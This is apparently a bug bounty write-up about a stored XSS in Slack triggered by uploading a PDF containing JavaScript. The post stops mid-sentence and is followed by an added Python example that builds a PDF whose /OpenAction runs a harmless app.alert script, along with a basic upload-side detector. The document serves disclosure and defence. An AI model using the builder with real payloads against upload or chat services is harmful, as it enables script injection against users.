Stored XSS on Slack, Bug Bounty

This was my first XSS-related finding that was rated a high-severity vulnerability on a bug bounty program. For finding this vulnerability I was paid a bounty of $4,875.

For general information about XSS vulnerabilities and their security impact, I suggest reading the material at this link: https://portswigger.net/web-security/cross-site-scripting.

Exploit:

The exploit for this vulnerability consists of uploading a PDF file containing JavaScript code to a Slack chat; if you clicked on it, it opened in their PDF…
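To make concrete what "a PDF file containing JavaScript" means, the following is an added example, not the file from the report and not Slack's code: it builds a minimal, valid PDF whose catalog carries an /OpenAction pointing at a /JavaScript action, and pairs it with a simple static check of the kind an upload filter could run. The app.alert payload is a harmless stand-in chosen for this example, and has_open_action_js is a hypothetical helper. Whether the embedded script actually executes depends entirely on the viewer that renders the file, which is why the viewer the post goes on to mention matters.

```python
# Added example: a minimal PDF with a JavaScript OpenAction, plus a basic
# static detector for the same construct.  Constructed for illustration; the
# payload is a harmless app.alert, not any payload from the original report.
import re


def build_js_pdf(js: str) -> bytes:
    """Return a minimal single-page PDF that runs `js` when opened (if the
    viewer honours /OpenAction JavaScript actions)."""
    # Backslash and parentheses must be escaped inside a PDF literal string.
    esc = js.replace("\\", "\\\\").replace("(", "\\(").replace(")", "\\)")
    objects = [
        # 1: catalog, with /OpenAction referencing the JavaScript action (obj 4)
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        # 2: page tree
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        # 3: one blank page
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >>",
        # 4: the action dictionary carrying the script
        b"<< /S /JavaScript /JS (" + esc.encode("latin-1") + b") >>",
    ]
    out = bytearray(b"%PDF-1.7\n")
    offsets = []
    for num, body in enumerate(objects, start=1):
        offsets.append(len(out))  # byte offset of "N 0 obj", needed for the xref
        out += f"{num} 0 obj\n".encode() + body + b"\nendobj\n"
    xref_pos = len(out)
    # Each xref entry is exactly 20 bytes: 10-digit offset, 5-digit gen, f/n, "\r\n" or " \n".
    out += f"xref\n0 {len(objects) + 1}\n".encode()
    out += b"0000000000 65535 f \n"
    for off in offsets:
        out += f"{off:010d} 00000 n \n".encode()
    out += (
        f"trailer\n<< /Size {len(objects) + 1} /Root 1 0 R >>\n"
        f"startxref\n{xref_pos}\n%%EOF\n"
    ).encode()
    return bytes(out)


def has_open_action_js(pdf: bytes) -> bool:
    """Hypothetical upload-side check: does the file declare an /OpenAction and a
    /JavaScript action?  Works for plain objects like the ones above; a real
    scanner must also inflate object streams and decode hex- or #-escaped names,
    which attackers use to hide exactly these tokens."""
    return (
        re.search(rb"/OpenAction", pdf) is not None
        and re.search(rb"/S\s*/JavaScript", pdf) is not None
    )


if __name__ == "__main__":
    data = build_js_pdf("app.alert(1)")
    with open("js_openaction.pdf", "wb") as fh:
        fh.write(data)
    print("wrote js_openaction.pdf; flagged:", has_open_action_js(data))
```

Open the generated file in different viewers to see the behaviour the post describes: a desktop reader that implements Acrobat JavaScript will show the alert, while a renderer that ignores /OpenAction will display a blank page. The detector is deliberately simple; it shows what an upload filter has to look for, not a complete defence.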